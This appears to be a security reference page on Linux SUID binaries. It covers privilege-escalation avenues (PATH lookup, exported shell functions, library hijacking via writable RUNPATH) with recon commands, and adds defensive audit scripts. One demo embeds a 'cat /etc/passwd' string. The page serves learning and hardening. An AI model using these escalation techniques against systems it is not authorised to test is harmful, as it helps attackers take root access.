SUID Binaries

Theory

SUID (setuid) stands for "set user ID upon execution"; the mechanism is supported out of the box by every Linux distribution. When a file with this bit set is executed, the effective uid of the resulting process becomes the uid of the file's owner. If the owner is root, the process runs as root even when user bob launched it. In ls -l output the SUID bit is shown as an s in the owner's execute position.

Practice

Misc SUID Binaries

Either of these commands finds all SUID binaries (errors from unreadable directories are discarded):

find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
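A one-off listing is only half of the job on the defending side: what matters is whether a SUID file appeared that was not there before, and whether any SUID file is writable by everyone. The script below is an added example, not code from the original page. It wraps the find commands above in three small functions and runs them on a constructed directory tree; the paths and the baseline file are assumptions for the demo.

```shell
#!/bin/sh
# Added example, not taken from the original page: build a baseline of SUID
# files and flag anything that is not in it, plus SUID files that are
# world-writable. The directory layout in the demo is constructed.

# list_suid ROOT: every setuid regular file below ROOT, sorted for diffing.
list_suid() {
    find "$1" -perm -4000 -type f 2>/dev/null | sort
}

# new_suid ROOT BASELINE: SUID files below ROOT that BASELINE (one absolute
# path per line) does not list. An empty result means nothing new appeared.
new_suid() {
    list_suid "$1" | while IFS= read -r path; do
        grep -Fxq -- "$path" "$2" || printf '%s\n' "$path"
    done
}

# writable_suid ROOT: SUID files that anyone can modify. A world-writable
# setuid binary is a critical finding on its own, baseline or not.
writable_suid() {
    find "$1" -perm -4000 -type f -perm -0002 2>/dev/null | sort
}

# Demo on a constructed tree: "known" is in the baseline, "added" is not.
demo=$(mktemp -d)
mkdir -p "$demo/bin"
printf '#!/bin/sh\necho hello\n' > "$demo/bin/known"
cp "$demo/bin/known" "$demo/bin/added"
chmod 4755 "$demo/bin/known" "$demo/bin/added"
printf '%s\n' "$demo/bin/known" > "$demo/baseline.txt"   # baseline taken "earlier"
echo "SUID files not in baseline:"
new_suid "$demo" "$demo/baseline.txt"                     # prints .../bin/added
echo "World-writable SUID files:"
writable_suid "$demo"                                     # prints nothing here
rm -rf "$demo"
```

On a real host, run `list_suid /` once on a known-good system and store the output; a later `new_suid / baseline.txt` then points straight at the binaries that need a look. The functions only use find, grep and sort, so they work from a rescue shell as well.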

No Command Path Exploit

If a SUID binary executes another command without specifying its full path, the command is resolved through the caller's PATH. Such a binary can be abused for privilege escalation.

You may use strings to spot calls to other binaries, or reverse engineer the SUID binary.

strings ./the-suid-bin

...
find
...

Functions Export Exploit - Full Path Binary

If the SUID binary executes another command by its full path, we can instead try to export a shell function named after the full command path that the SUID file calls. This only works when the binary launches the command through a shell such as bash that imports function definitions from the environment; a binary that execve()s the path directly is not affected.

You may use strings to spot calls to other binaries or commands, or reverse engineer the SUID binary.

strings ./the-suid-bin

...
/usr/sbin/service apache2 start
...
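Both sections above boil down to the same review step: pull the strings out of the binary and sort them into bare command names (resolved through PATH) and absolute-path invocations (worth a look only if they go through a shell). The script below is an added example and not code from the original page; it uses a small stand-in for strings(1) so it also runs where binutils is not installed, and the command list and the sample "binary" are constructed for the demo.

```shell
#!/bin/sh
# Added example, not taken from the original page: extract printable strings
# from a binary (a small stand-in for strings(1)) and split them into bare
# command names, which the binary would resolve through PATH, and
# absolute-path invocations. The command list and the sample file are
# constructed for the demo.

# Command names worth flagging when they appear as bare strings
# (assumption: extend to taste).
common_cmds="sh bash cat cp chmod chown find id ls mv rm service systemctl"

# printable_strings FILE: runs of 4 or more printable ASCII bytes, one per
# line, which is what strings(1) prints by default.
printable_strings() {
    LC_ALL=C tr -c '[:print:]' '\n' < "$1" | LC_ALL=C grep -E '^.{4,}$'
}

# bare_commands FILE: strings whose first word is one of $common_cmds and
# carries no path, e.g. "find" or "cat /etc/passwd".
bare_commands() {
    printable_strings "$1" | grep -E '^[A-Za-z0-9_.-]+( .*)?$' | while IFS= read -r line; do
        cmd=${line%% *}
        case " $common_cmds " in *" $cmd "*) printf '%s\n' "$line" ;; esac
    done
}

# absolute_commands FILE: strings that start with a path under /bin, /sbin,
# /usr/bin or /usr/sbin, e.g. "/usr/sbin/service apache2 start".
absolute_commands() {
    printable_strings "$1" | grep -E '^/(usr/)?s?bin/[^ ]+' | sort -u
}

# audit_invocations FILE: print both classes with a label in front.
audit_invocations() {
    bare_commands "$1"     | sed 's/^/PATH-lookup: /'
    absolute_commands "$1" | sed 's|^|absolute:    |'
}

# Demo on a constructed "binary": junk bytes around three command strings.
demo=$(mktemp -d)
printf 'ELF\177\000find\000\000/usr/sbin/service apache2 start\000cat /etc/passwd\000zz\000' > "$demo/fake-suid"
audit_invocations "$demo/fake-suid"
rm -rf "$demo"
```

The "PATH-lookup" lines are the ones the first section is about; a fix on the binary's side is to call the command by its absolute path or to reset PATH before executing it. The "absolute" lines are only a concern if the binary hands them to a shell, which is what the second section describes.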

Shared Library Hijacking

If you find a binary with SUID permissions, check whether all the .so files it needs are loaded correctly:

strace the-suid-bin 2>&1 | grep -i -E "open|access|no such file"

You could also check whether the SUID binary loads a library from a directory that unprivileged users can write to:

# Let's find a SUID binary that uses a non-standard library
ldd the-suid-bin
something.so => /lib/x86_64-linux-gnu/something.so

# The SUID binary also searches a custom location that we can write to
readelf -d the-suid-bin | grep PATH
0x000000000000001d (RUNPATH)            Library runpath: [/development]

Alternatively, you could use the strings command to list the shared libraries the binary references:

strings ./the-suid-bin | grep -E '\.so(\.[0-9]+)?'
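The readelf check above tells you where the loader will search, but not whether that location is safe. The script below is an added example, not code from the original page: it parses RPATH/RUNPATH entries out of readelf -d output in the format shown above and reports every search directory that is missing or writable by group or others. The sample readelf line and the demo directories are constructed.

```shell
#!/bin/sh
# Added example, not taken from the original page: parse the RPATH/RUNPATH
# entries from `readelf -d` output and report each search directory that is
# missing or writable by group/others, i.e. a place where an unprivileged
# user could drop a library of their own. The sample readelf line and the
# directories are constructed.

# runpath_dirs: reads `readelf -d` output on stdin and prints every
# directory from RPATH/RUNPATH entries, one per line. $ORIGIN is printed
# literally (assumption: not expanded here).
runpath_dirs() {
    grep -E '\((RPATH|RUNPATH)\)' | sed -n 's/.*\[\(.*\)\].*/\1/p' | tr ':' '\n' | grep -v '^$'
}

# check_dir DIR: prints "<verdict> DIR" where verdict is missing,
# world-writable, group-writable or ok. Mode bits are read from ls -ld so
# the check does not depend on a particular stat(1) dialect.
check_dir() {
    if [ ! -d "$1" ]; then
        printf 'missing %s\n' "$1"
        return
    fi
    mode=$(ls -ld "$1" | cut -c1-10)
    case $mode in
        ????????w?) printf 'world-writable %s\n' "$1" ;;
        ?????w????) printf 'group-writable %s\n' "$1" ;;
        *)          printf 'ok %s\n' "$1" ;;
    esac
}

# audit_runpath BINARY: run the two steps above on a real ELF file.
audit_runpath() {
    readelf -d "$1" 2>/dev/null | runpath_dirs | while IFS= read -r dir; do
        check_dir "$dir"
    done
}

# Demo with a constructed readelf line and three constructed directories:
# one sane, one world-writable (like /tmp), one that does not exist.
demo=$(mktemp -d)
mkdir "$demo/safe" "$demo/open"
chmod 755 "$demo/safe"
chmod 1777 "$demo/open"
sample="0x000000000000001d (RUNPATH)            Library runpath: [$demo/open:$demo/safe:$demo/gone]"
printf '%s\n' "$sample" | runpath_dirs | while IFS= read -r dir; do
    check_dir "$dir"
done
rm -rf "$demo"
```

A "missing" directory is reported because the loader keeps searching the remaining entries, and an attacker who can create that directory (or its parent) gets the same result as a writable one. The sticky bit does not make a directory safe here: creating a new file in a 1777 directory is exactly what is needed to plant a library, so it is still reported as world-writable.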
